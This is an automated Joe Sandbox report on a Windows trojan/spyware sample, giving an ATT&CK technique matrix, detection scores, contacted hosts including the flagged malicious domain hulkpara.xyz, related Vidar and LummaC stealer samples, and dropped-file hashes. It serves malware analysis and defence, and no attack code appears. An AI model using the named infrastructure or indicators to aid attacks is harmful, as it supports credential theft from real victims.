                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Extra Window Memory Injection | 2 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 21 Input Capture | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 1 DLL Side-Loading | NTDS | 27 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 Extra Window Memory Injection | LSA Secrets | 11 Query Registry | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 12 Process Injection | 111 Masquerading | Cached Domain Credentials | 221 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Valid Accounts | DCSync | 11 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Virtualization/Sandbox Evasion | Proc Filesystem | 4 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                [Behavior graph: ID: 1578042, Sample: pM3fQBuTLy.exe, Startdate: 19/12/2024, Architecture: WINDOWS, Score: 100]

                Source | Detection | Scanner | Label | Link
                pM3fQBuTLy.exe | 11% | ReversingLabs | Win32.Trojan.Sonbokli |
                pM3fQBuTLy.exe | 10% | Virustotal | | Browse

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Local\Temp\325114\Miniature.com | 0% | ReversingLabs | |

                No Antivirus matches
                No Antivirus matches

                Source | Detection | Scanner | Label | Link
                https://hulkpara.xyz/ | 100% | Avira URL Cloud | malware |
                https://t.m | 0% | Avira URL Cloud | safe |

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                chrome.cloudflare-dns.com | 162.159.61.3 | true | false | | high
                t.me | 149.154.167.99 | true | false | | high
                ssl.bingadsedgeextension-prod-europe.azurewebsites.net | 94.245.104.56 | true | false | | high
                sb.scorecardresearch.com | 18.165.220.66 | true | false | | high
                www.google.com | 172.217.19.228 | true | false | | high
                hulkpara.xyz | 94.130.191.168 | true | true | | unknown
                s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
                googlehosted.l.googleusercontent.com | 172.217.17.65 | true | false | | high
                clients2.googleusercontent.com | unknown | unknown | false | | high
                bzib.nelreports.net | unknown | unknown | false | | high
                assets.msn.com | unknown | unknown | false | | high
                cvCCAtzStAgfHNw.cvCCAtzStAgfHNw | unknown | unknown | false | | unknown
                ntp.msn.com | unknown | unknown | false | | high

                Name | Malicious | Antivirus Detection | Reputation
                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734597976003&w=0&anoncknm=app_anon&NoResponseBody=true | false | | high
                https://c.msn.com/c.gif?rnd=1734597969347&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c87c0c2827f044b19e1956450ca6519b&activityId=c87c0c2827f044b19e1956450ca6519b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 | false | | high
                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734597974994&w=0&anoncknm=app_anon&NoResponseBody=true | false | | high
                https://hulkpara.xyz/ | true | Avira URL Cloud: malware | unknown
                https://sb.scorecardresearch.com/b?rn=1734597969348&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=08F1B41B03E76B2C0A73A14102FE6A7B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null | false | | high
                https://assets.msn.com/statics/icons/favicon_newtabpage.png | false | | high
                https://c.msn.com/c.gif?rnd=1734597969347&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c87c0c2827f044b19e1956450ca6519b&activityId=c87c0c2827f044b19e1956450ca6519b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=267493DD80724C64AC29441BD36923AF&MUID=08F1B41B03E76B2C0A73A14102FE6A7B | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                high
                                                                                                                                                                                https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.27.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://ogs.googchrome.exe, 00000015.00000002.1722678966.00000104000FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://anglebug.com/5371chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://anglebug.com/4722chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://m.google.com/devicemanagement/data/apichrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000015.00000002.1724787435.0000010400760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727840637.0000010400EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723989968.0000010400500000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://anglebug.com/7556chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://chromewebstore.google.com/chrome.exe, 00000015.00000002.1722870036.000001040018C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000002.1852071829.000071EC0016C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.26.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgMiniature.com, 00000010.00000002.2127699132.0000000004941000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2125663035.0000000001C8B000.00000004.00000020.00020000.00000000.sdmp, A1NG4W.16.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://clients4.google.com/chrome-syncchrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://anglebug.com/6692chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://issuetracker.google.com/258207403msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://anglebug.com/3502chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://anglebug.com/3623msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://www.office.comc8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      http://anglebug.com/3625msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://outlook.live.com/mail/0/c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          http://anglebug.com/3624msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://docs.google.com/presentation/Jchrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://t.mMiniature.com, 00000010.00000003.1461059136.00000000043CF000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461285566.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461401955.0000000004428000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461497225.00000000043CE000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461010289.000000000443F000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461497225.00000000043A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://anglebug.com/5007chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723566178.0000010400394000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  http://anglebug.com/3862chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://ntp.msn.com/edge/ntp000003.log7.26.dr, 2cc80dabc69f58b6_1.26.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000015.00000003.1651763850.0000010400ECC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650672473.000001040033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1673459388.0000010400D18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1656708823.0000010400D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650694126.0000010400D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1651721993.0000010400D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1651298316.0000010400D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1657519462.00000104012CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1655875411.0000010400D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://www.ecosia.org/search?q=&addon=opensearchchrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          http://anglebug.com/4836chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://issuetracker.google.com/issues/166475273msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                              • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                                                                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                              172.64.41.3
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              108.139.47.108
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                              94.130.191.168
                                                                                                                                                                                                                                              hulkpara.xyzGermany
                                                                                                                                                                                                                                              24940HETZNER-ASDEtrue
                                                                                                                                                                                                                                              104.126.116.26
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                              239.255.255.250
                                                                                                                                                                                                                                              unknownReserved
                                                                                                                                                                                                                                              unknownunknownfalse
                                                                                                                                                                                                                                              23.219.82.40
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                              52.168.117.168
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                              IP
                                                                                                                                                                                                                                              192.168.2.7
                                                                                                                                                                                                                                              127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578042
Start date and time: 2024-12-19 08:11:59 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: pM3fQBuTLy.exe (renamed because original name is a hash value)
Original Sample Name: c5f715f9eefa5e42fd10fc3b6e90953b.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@89/293@21/18
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 76
• Number of non-executed functions: 299
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
• Not all processes were analyzed; report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
02:12:52  API Interceptor  1x Sleep call for process: pM3fQBuTLy.exe modified
02:12:58  API Interceptor  1x Sleep call for process: Miniature.com modified
                                                                                                                                                                                                                                                                      • telegram.dog/
                                                                                                                                                                                                                                                                      LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                                      • t.me/cinoshibot
                                                                                                                                                                                                                                                                      jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                                      • t.me/cinoshibot
Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
                                                                                                                                                                                                                                                                      AKAMAI-ASUSCGESrvGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                                                                                      • 23.207.53.102
                                                                                                                                                                                                                                                                      1.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 23.57.220.59
                                                                                                                                                                                                                                                                      la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 23.211.7.47
                                                                                                                                                                                                                                                                      la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 23.199.141.119
                                                                                                                                                                                                                                                                      la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 23.13.44.108
                                                                                                                                                                                                                                                                      la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 23.50.132.247
                                                                                                                                                                                                                                                                      http://files.playanext.com/v8/avast_secure_browser_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 23.50.252.137
                                                                                                                                                                                                                                                                      la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 104.98.7.134
                                                                                                                                                                                                                                                                      loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 23.60.108.117
                                                                                                                                                                                                                                                                      loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 23.209.249.233
                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19script.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                                                                      • 94.130.191.168
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      Brooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                                      • 94.130.191.168
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      TT copy.jsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                      • 94.130.191.168
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 94.130.191.168
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 94.130.191.168
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 94.130.191.168
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 94.130.191.168
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 94.130.191.168
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 94.130.191.168
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 94.130.191.168
                                                                                                                                                                                                                                                                      • 149.154.167.99
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\325114\Miniature.com | QIo3SytSZA.exe | malicious | Vidar
 | 'Setup.exe | malicious | LummaC Stealer
 | CapCut_12.0.4_Installer.exe | malicious | LummaC Stealer
 | CapCut_12.0.4_Installer.exe | malicious | LummaC Stealer
 | Setup.msi | malicious | Vidar
 | 69633f.msi | malicious | Vidar
 | fm2r286nqT.exe | malicious | LummaC
 | nB52P46OJD.exe | malicious | Vidar
 | lem.exe | malicious | Vidar
 | Setup.msi | malicious | Vidar
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.137181696973627
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                                                                                                                                                                                                                          MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                                                                                                                                                                                                                          SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                                                                                                                                                                                                                          SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                                                                                                                                                                                                                          SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):155648
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1769), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9370
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.514140640374404
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
